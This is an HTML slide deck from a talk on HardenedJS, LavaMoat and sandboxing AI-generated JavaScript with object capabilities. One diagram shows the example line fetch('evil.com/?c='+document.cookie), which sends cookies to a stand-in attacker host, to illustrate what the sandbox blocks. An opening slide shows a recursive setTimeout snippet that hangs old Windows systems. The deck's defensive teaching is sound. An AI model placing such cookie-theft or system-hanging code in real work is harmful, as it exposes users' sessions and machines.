<!doctype html>
<html lang="en">

<head>
  <meta charset="utf-8">

  <title>LavaMoat</title>

  <meta name="author" content="naugtur">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

  <meta name="viewport"
    content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui">


  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/reset.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/reveal.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/theme/black.css" id="theme">

  <!-- Theme used for syntax highlighting of code -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/highlight/zenburn.css">


  <link rel="stylesheet" href="../branding/style4x.css" id="branding">
  <style>
    #naugtur.reveal .muchcode pre>code {
      max-height: 90vh;
      min-width: 70vw;
      font-size: 0.88em;
    }

    #naugtur pre svg {
      line-height: normal;
    }

    #naugtur:before {
      content: 'naugtur.pl';
      position: fixed;
      bottom: .5em;
      left: .5em;
      font-size: .8em;
      animation-name: spin;
      animation-timing-function: linear;
      animation-iteration-count: infinite;
      animation-duration: 30s;
      transform-style: preserve-3d;
      transform: rotateX(0.5deg);
      transform-origin: 50% 50%;
    }

    @keyframes spin {
      0% {
        transform: rotateX(0deg);
      }

      3% {
        transform: rotateX(-360deg);
      }

      100% {
        transform: rotateX(-360deg);
      }
    }

    .boxes {
      width: 70vw;
      height: 70vh;
      font-size: 5vh;

    }

    .boxes div {
      box-sizing: border-box;
      width: 46%;
      height: 44%;
      float: left;
      border: 3px solid #3c873a;
      margin: 2%;
      text-align: center;
      font-size: 0.7em;
      line-height: 2em;
      padding: 2%;
    }


    .an-container {
      width: 100%;
      height: 550px;

    }

    .an-item,
    .an-start-loc {
      position: fixed;
      top: 15%;
      left: 15%;
    }

    .an-y {
      z-index: 11;
      max-height: none !important;
    }

    .an-target {
      position: fixed;
      top: 326px;
      right: 8%;
      width: 40%;
      z-index: 0;

    }

    .reveal section img.clear {
      border: none;
      background: none;
      box-shadow: none;
      max-width: 50%;
    }

    .an-item {
      offset-path: path('M100,80 C200,-200 500,0 600,300');
      offset-rotate: 0deg;
    }

    .an-item.an-to {
      animation: move 4444ms infinite ease-in-out;
    }

    .an-item.an-oops {
      background-color: rgba(255, 166, 60, 0.9);

      /* animation-play-state: paused !important; */
      border-radius: 50%;
      /* offset-path: path('M30,80 C200,-200 500,0 320,200'); */
      animation: discover 4444ms ease-in-out;
      animation-fill-mode: forwards;
      z-index: 10;

    }

    @keyframes move {
      0% {
        offset-distance: 0%;
      }

      100% {
        offset-distance: 100%;
      }
    }

    #naugtur .moji h1 {
      line-height: 3em;
    }

    sub>sup,
    sup>sub {
      color: #777;
    }

    #naugtur .whitehat .slide-background-content {
      background: url('./ilus/dev.png') no-repeat top right / 20%;
    }

    #naugtur .blackhat .slide-background-content {
      background: url('./ilus/hacker.png') no-repeat bottom right / 35%;
    }

    #naugtur .bothat .slide-background-content {
      background: url('./ilus/bothat.png') no-repeat bottom right / 20%;
    }

    #naugtur .blackhat pre.code-wrapper {
      width: 75%;
    }

    #naugtur .animateBot pre {
      width: 200%;
      margin-left: 20px;
      overflow-x: visible;
      overflow-y: hidden;
    }

    #naugtur .animateBot.animateOne pre {
      height: 14em;
    }

    #naugtur .animateBot.animateOne pre>code {
      height: 14.5em;
    }

    #naugtur .animateBot.animateMany pre {
      height: 5em;
      border: 10px solid #ff7834;
      border-radius: 1em;
      width: 40%;
      float: left;
      padding: 1em;
      overflow: hidden;
    }

    #naugtur .animateBot.animateMany pre>code {
      overflow: hidden;
      width: 100%;
      margin-top: -4em;
    }

    #naugtur .animateBot.animateMany img {
      width: 10%;
    }

    #naugtur .animateBot.animateMany p {
      margin: 0;
    }

    #naugtur .animateBot pre>code {
      overflow: scroll;
      font-size: 0.6em;
      line-height: 0.9em;
      background: transparent
    }
  </style>
</head>

<body>

  <div class="reveal none" id="naugtur">

    <div class="slides">
      <!-- <section> -->

      <section>
        <br><br>
        <h1>thinking fast and slow</h1>
        <br>
        <h4>HardenedJS, LavaMoat and AI</h4>
        <small>@naugtur, 2025</small>
      </section>
      <section>
        <section>
          <h3>
            Who's that guy?
          </h3>

          <img src="../../me.avatar.jpg" height="100px">
          <img src="./ilus/js.svg" height="100px">
          <img src="../../mjs.svg" height="100px">
          <img src="./ilus/lm.png" height="100px">
          <img src="./ilus/mm.svg" height="100px">


        </section>
        <section data-markdown>
          <textarea>
#### I was into JS security <br>before I knew JS<br>or security

```js
function kill(){
  setTimeout('kill',0)
  setTimeout('kill',0)
}
kill()
```

<sub><sup>first 5 lines of JS I've written break Windows 98 up to XP before SP2</sup></sub>
          </textarea>
        </section>
      </section>




      <section data-markdown>
        <textarea data-template>
            # 🐐 
            ## Alignment Problem
            #### is older than you thought

            ---

            # 🤞
            ### Software architectures rely on
            
            ## intention alignment

            <br><br>

            All code serves the common goal of the app working

            ---

            ### Code authors in your app:

            🙋 you, the team (few)  
            🧑‍🤝‍🧑 other teams (more)  
            🧙 pkg authors (many)  
            🤖 AI agents (many more?)  
            
            ---

            # 🤯
            ## Intention alignment is a myth
            
            ---
            
            ### 🧠🔨
            - Authors publish malicious packages
            - Devs write buggy code
            - Bugfix in one corner breaks another corner
            - Teams work under different constraints and OKRs

            - Hallucinated package names - [Slopsquatting](https://socket.dev/blog/slopsquatting-how-ai-hallucinations-are-fueling-a-new-class-of-supply-chain-attacks)
            - AI code messing up shared resources
            - LLMs regurgitating old vulnerabilities           

            ---

            ### I hear alignment is<br>a hard problem with humans too 😉


            - Tradition
            - Law
            - Separation of powers (in gov)<br>**In software:**
            - Conway's law
            - Microservices
            - Error boundaries

            ---

            # Fearless cooperation
            # 🦸

            ---

            ### Fearless cooperation

            We need tools and architectures that let software cooperate without authors necessarily trusting each other.

            ---

            #### There has been serious research
            [Listen to Mark S. Miller for more](https://foresight.org/summary/mark-s-miller-agoric-computational-markets-agoric-systems/)

            ---

            ### I'm here to tell you about fearless cooperation tools
            # 🧰

          </textarea>
      </section>
      <section data-markdown>
        <textarea data-template>
![](./ilus/hardenedjs.svg)

## Hardened Javascript

Provides a secure environment for running code.

---

### JS design is good for security?

- Take ECMA + W3C
- Add Conway's Law
- Separation between language and APIs
- Power only reachable through scope
- Compartment controls scope
- Hardened JavaScript ✅

---

  ## Part of the language!
  #### ( eventually )

  https://github.com/tc39/proposal-compartments

---

### Object Capability

vs identity based security

- code gets references to capable objects
- code doesn't "just work on your behalf"

<br><br>
OCap is a security model that enables <br>Fearless Cooperation.

---

### Object Capability

You already know how to use it

```js
import { lint } from 'some-linter'
import { readFile } from 'node:fs/promises'

const fs = { readFile }

lint({ fs })
```

---

https://lavamoat.github.io

![lavamoat](./ilus/lm.png)

LavaMoat uses HardenedJS to provide security for JavaScript projects of today and tomorrow.


            </textarea>
      </section>

      <section class="whitehat" data-markdown>
        ### Agent, please write a feature for me.
      </section>
      <section class="animateBot animateOne bothat" data-markdown>
        <textarea data-template>
        ### Ok, here we go!

        ```js
        //This script is critical for the main dashboard functionality. (v2.1.4 - URGENT FIX)

        // --== GLOBAL CONFIGURATION AND STATE VARIABLES ==--
        g_currentUser = 'admin_legacy';
        g_errorCount = 0; 
        MAX_ERRORS_ALLOWED = 3; 
        g_api_endpoint = '/api/data';
        g_featureFlags = { useNewAnalytics: true, enableCaching: "true", darkMode: false };

        // --== PROTOTYPE EXTENSIONS (Global Helpers - DO NOT REMOVE) ==--
        String.prototype.capitalize=function(){return this.charAt(0).toUpperCase()+this.slice(1);}
        Array.prototype.hasItem=function(itm){var i;for(i=0;i<this.length;i++){if(JSON.stringify(this[i])==JSON.stringify(itm)){return true;}} return false;}

        // --== INITIALIZATION ==--
        function initializeDashboard() {
            console.log("Bootstrapping dashboard for user: " + g_currentUser);
            var el_cont = document.body
            if (!el_cont) { handleErrors(new Error("Container element not found!")); return; }
            el_cont.innerHTML = '<div class="loader" style="padding: 50px; text-align: center;">Loading dashboard components, please stand by...</div>';
            setTimeout(function() {
                console.log("Fetched core settings.");
                g_userSettings={'theme':'dark','showProfilePic':'true','widgets':['profile','news','analytics_adv','tasks']};
                fetchWidgetData(g_userSettings.widgets);
            }, 1500);
        }

        // --== DATA FETCHING & PROCESSING ==--
        function fetchWidgetData(widgetsArr) {
        if(g_isUpdating){console.log("Update locked.");return;} g_isUpdating = true;
        console.log("Fetching data for widgets: ", widgetsArr);
        var w_len = widgetsArr.length; var w_fetched = 0;
        for(var i=0;i<w_len;i++){ var w_name = widgetsArr[i];
        (function(nm){
        setTimeout(function(){
            console.log('Got data for '+nm);var d_obj;
            if(nm=='profile'){d_obj={user:'admin_legacy',lastLogin:'2025-10-21T12:00:00Z',avatar:'avatar.png'};}
            else if(nm=='news'){d_obj={articles:[{title:'Big Corp Releases New Product!',summary:'A total game changer!'},{title:'Market Trends for Q4',summary:'Stocks are going up.'}]};}
            else if(nm=='analytics_adv'){d_obj={timeSeries:[120,150,130,180,210,190],topReferrers:[{src:'google.com',val:450},{src:'twitter.com',val:210}],geoData:{'US':75,'EU':15,'AS':10}};}
            else if(nm=='tasks'){d_obj={incomplete:[{id:101,text:'Refactor the legacy codebase'},{id:202,text:'Deploy to production server immediately'}]};}
            else{throw new Error("Unknown widget type: "+nm);}
            if(g_featureFlags.enableCaching=="true" && !g_widgetDataCache.hasItem({type:nm,data:d_obj})){g_widgetDataCache.push({type:nm,data:d_obj});}
            }catch(e){console.log('An error occurred!');handleErrors(e);
            }finally{ w_fetched++;
                if(w_fetched==w_len){console.log("All widget data received.");g_isUpdating=false;g_lastUpdated=new Date();processAndRenderDashboard();}
            }
        },1000+Math.random()*1000);
        })(w_name);
        }
        }

        // --== "JSX" COMPONENT FOR ADVANCED ANALYTICS (DO NOT TOUCH - COMPLEX LOGIC) ==--
        function renderAdvancedAnalyticsComponent_JSX(data_obj) {
            // This function mimics a JSX component by returning an HTML string.
            // It's full of meaningless variables and confusing structure.
            var d = data_obj.timeSeries;
            var r = data_obj.topReferrers;
            var g = data_obj.geoData;
            var tmp_v = 0;
            for (var i = 0; i < d.length; i++) { tmp_v += d[i]; }
            var avg_val = tmp_v / d.length;

            // JSX-like string construction
            var jsx_str = '<div class="analytics-container">';
            jsx_str += '<h3>Detailed Analytics Breakdown</h3>';
            jsx_str += '<div class="stat-main">Average Views: <span>' + avg_val.toFixed(1) + '</span></div>';
            
            // Chart simulation with divs
            jsx_str += '<div class="chart-simulation">';
            for (var k = 0; k < d.length; k++) {
                var p_h = (d[k] / Math.max.apply(null, d)) * 100;
                jsx_str += '<div class="bar" style="height:' + p_h + '%;" title="'+d[k]+'"></div>';
            }
            jsx_str += '</div>';

            // Referrers table
            jsx_str += '<h4>Top Referrers</h4>';
            var tbl_str = '<table><thead><tr><th>Source</th><th>Visitors</th></tr></thead><tbody>';
            for (var j = 0; j < r.length; j++) {
                var ref_item = r[j];
                tbl_str += '<tr><td>' + ref_item.src + '</td><td>' + ref_item.val + '</td></tr>';
            }
            tbl_str += '</tbody></table>';
            jsx_str += tbl_str;

            jsx_str += '</div>'; // close analytics-container
            return jsx_str;
        }


        // --== EVENT HANDLERS AND UTILITIES ==--
        function attachPostRenderHooks(){
            var w_coll = document.getElementsByClassName('widget');
            for(var i=0;i<w_coll.length;i++){w_coll[i].addEventListener('mouseover', function(e){this.style.boxShadow='0 0 10px rgba(0,0,255,0.5)';}); w_coll[i].addEventListener('mouseout', function(e){this.style.boxShadow='none';});}
        }
        function completeTask(id, btn_el){console.log("Completing task: "+id);btn_el.disabled=true;btn_el.textContent='Completed';alert("Task "+id+" was marked complete. UI will NOT update until full refresh.");}
        function handleErrors(err) {
            console.log("FATAL: " + err.message); g_errorCount++;
            if(g_errorCount>MAX_ERRORS_ALLOWED){document.getElementById(g_appContainerId).innerHTML='<div class="error-msg">A fatal error has occurred. The application is now unstable. Please refresh the page.</div>';}
        }

        // --== SCRIPT ENTRY POINT ==--
        initializeDashboard();


        ```
        </textarea>
      </section>
      <section class="whitehat" data-markdown>
        ### That's better

        ![](./ilus/botcont1.png)
      </section>

     
      <section data-markdown>
        <textarea data-template>
          ### HardenedJS + AI
          
          > HardenedJS lets me put AI generated code anywhere I want and have confidence it won't mess up the rest of my app.

          ---

          # 🦎 🧠
          ## Thinking fast and slow

          ---

          ### Working with MCPs

          - make multiple calls for data
          - merge the data together

          ---

          ### MCP forces LLM to process <br>"in its head"

          - why waste resources? 
            - we can merge JSON without AI
          - why risk hallucinating?

        
          ---

          ### thinking slow

          ```mermaid
          graph LR
            A[User Prompt] --> B((🧠 AI Agent))
            B --> C[MCP Server 1]
            B --> D[MCP Server 2]
            B --> E[MCP Server 3]
            C --> F[Data 1]
            D --> G[Data 2]
            E --> H[Data 3]
            F --> BB(((🧠 AI Agent)))
            G --> BB
            H --> BB
            BB --> I[Final Output]

          ```
          ---

          #### LLMs are better at generating code than strict reasoning

          ---

          ### thinking fast and slow

          ```mermaid
          graph LR
            A[User Prompt] --> B((🧠 AI Agent))
            B --> C
            B --> I[Final Output]
            subgraph CODE[Orchestration Code Contained]
              C["🦎\nfetchData1();\nfetchData2();\nfetchData3();\nd=mergeData(d1,d2,d3);\n_"] --> D1["rePrompt(d)"]

              C --- Pf
              C --- Pp

              subgraph POW[Powers]
                Pf{{fetch}} 
                Pp{{prompt}}
              end
            end
            
            D1 --Yes it can loop--> B
          ```
          ---

          ### no risks

          ```mermaid
          graph LR
            A[User Prompt] --> B((🧠 AI Agent))
            B --> C
            C --> E{Error}
            subgraph CODE[Orchestration Code Contained]
              C["🦎\nfetch('evil.com/?c='+document.cookie)\n_"] 

              C --- Pf
              C -.-x Pp

              subgraph POW[Powers]
                Pf{{fetch}} 
                Pp{{document}}
              end
            end
            
          ```

          ---

          ## Can even run inside a website

          - HardenedJS sandboxed
          - limited powers
          - access to UI integration APIs

          ---
          
          ### Triangular strawberry arrangement
          # 🍓
          # 🍓🍓

        </textarea>
      </section>
       <section data-markdown data-background="./ilus/botcont2.png">
        # What if...

      </section>
      <section data-markdown class="animateBot animateMany">
        <textarea data-template>
        ## What if your app...

        ```js
        function renderComponent(props) {
          var d = props.timeSeries;
          var r = props.topReferrers;
          var g = props.geoData;
          var tmp_v = 0;
          for (var i = 0; i < d.length; i++) { tmp_v += d[i]; }
          var avg_val = tmp_v / d.length;

          // JSX-like string construction
          var jsx_str = '<div class="analytics-container">';
          jsx_str += '<h3>Detailed Analytics Breakdown</h3>';
          jsx_str += '<div class="stat-main">Average Views: <span>' + avg_val.toFixed(1) + '</span></div>';
        ```

        ```js
        // Chart simulation with divs
        const chart = (options) => {
          jsx_str += '<div class="chart-simulation">';
          for (var k = 0; k < d.length; k++) { var p_h=(d[k] / Math.max.apply(null, d)) * 100; jsx_str
              +='<div class="bar" style="height:' + p_h + '%;" title="' +d[k]+'">
          </div>';
          }
        jsx_str += '
        </div>';
            else if(nm=='analytics_adv'){d_obj={timeSeries:[120,150,130,180,210,190],topReferrers:[{src:'google.com',val:450},{src:'twitter.com',val:210}],geoData:{'US':75,'EU':15,'AS':10}};}

        ```

        ![](./ilus/lavamoat-logo.png)

        ```js
        // Referrers table
        jsx_str += '<h4>Top Referrers</h4>';
        var tbl_str = '<table>
          <thead>
            <tr>
              <th>Source</th>
              <th>Visitors</th>
            </tr>
          </thead>
          <tbody>';
            for (var j = 0; j < r.length; j++) { var ref_item=r[j]; tbl_str +='<tr><td>' + ref_item.src + '</td><td>' +
              ref_item.val + '</td></tr>' ; } 
             else if(nm=='news'){d_obj={articles:[{title:'Big Corp Releases New Product!',summary:'A total game changer!'},{title:'Market Trends for Q4',summary:'Stocks are going up.'}]};}
            else if(nm=='tasks'){d_obj={incomplete:[{id:101,text:'Refactor the legacy codebase'},{id:202,text:'Deploy to production server immediately'}]};}
            
        ``` 

        ```js
        function fetchWidgetData(widgetsArr) {
        if(g_isUpdating){console.log("Update locked.");return;} g_isUpdating = true;
        console.log("Fetching data for widgets: ", widgetsArr);
        var w_len = widgetsArr.length; var w_fetched = 0;
        for(var i=0;i<w_len;i++){ var w_name = widgetsArr[i];
        (function(nm){
        setTimeout(function(){
            console.log('Got data for '+nm);var d_obj;
            if(nm=='profile'){d_obj={user:'admin_legacy',lastLogin:'2025-10-21T12:00:00Z',avatar:'avatar.png'};}
            else if(nm=='news'){d_obj={articles:[{title:'Big Corp Releases
        ```


        ---


        </textarea>
      </section>


      <section>
        <h4> </h4>

        <img src="naugtur.svg" style="height:6em" />

        <p>@naugtur &nbsp; <a href="https://naugtur.pl/">naugtur.pl</a></p>
        <p> <a href="https://naugtur.pl/training">naugtur.pl/training</a></p>


      </section>

    </div>

  </div>

  <style>
    #naugtur {
      background-image: none;
    }

    /*effectively switch from contain to cover behav*/
    #naugtur .slide-background video {
      min-width: 100%;
      min-height: 100%;
      width: auto;
      height: auto;
    }
  </style>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/reveal.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/zoom/zoom.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/notes/notes.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/search/search.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/markdown/markdown.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/reveal.js/4.3.1/plugin/highlight/highlight.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/reveal.js-mermaid-plugin@2.3.0/plugin/mermaid/mermaid.js"></script>




  <script>
    // Full list of configuration options available at:
    // https://github.com/hakimel/reveal.js#configuration
    Reveal.initialize({
      controls: true,
      progress: true,
      history: true,
      center: true,
      mouseWheel: true,

      transition: 'concave', // none/fade/slide/convex/concave/zoom
      mermaid: {
        theme: "dark"
      },

      plugins: [RevealZoom, RevealNotes, RevealSearch, RevealMarkdown, RevealHighlight, RevealMermaid],
      // autoAnimateEasing: 'linear',

      // Parallax background image
      // parallaxBackgroundImage: '../branding/bk.jpg', // e.g. "https://s3.amazonaws.com/hakim-static/reveal-js/reveal-parallax-1.jpg"
      //
      // // Parallax background size
      // parallaxBackgroundSize: '1920px 880px', // CSS syntax, e.g. "2100px 900px" - currently only pixels are supported (don't use % or auto)


    });

    function installAnimation(an, icon, delay) {
      var el = document.createElement('span');
      el.classList.add('an-item');
      el.innerHTML = icon;
      an.appendChild(el)
      setTimeout(() => el.classList.add('an-to'), delay);
      return el
    }
    let animationIntervals = [];
    Reveal.addEventListener('slidechanged', (event) => {
      animationIntervals.map(clearInterval);
      console.log(event.currentSlide)
      if (event.currentSlide.classList.contains('animatedSlide')) {
        var an = event.currentSlide.querySelector('.an-container');
        an.innerHTML = '';
        var pkgs = '📦,'.repeat(30).split(',')
        if (event.currentSlide.classList.contains('bad')) {
          pkgs[4] = '💣';
          pkgs[10] = '🔥';
          pkgs[27] = '👿';
        }
        pkgs.forEach((icon, index) =>
          installAnimation(an, icon, 7777 * Math.log10((index) / 3 + 1))
        )
      }

      if (event.currentSlide.classList.contains('animateBot')) {
        const codeItems = event.currentSlide.querySelectorAll('.animateBot pre code');
        codeItems.forEach(code => {
          const childNodes = Array.from(code.childNodes);
          code.innerHTML = '';
          let i = 0;
          animationIntervals.push(setInterval(() => {
            if (i >= childNodes.length) {
              i = 0;
              childNodes.sort(() => Math.random() - 0.5);
            }
            code.appendChild(childNodes[i]);
            code.scrollTop = code.scrollHeight;
            i++;
          }, 40));
        })



      }
    })


  </script>

</body>

</html>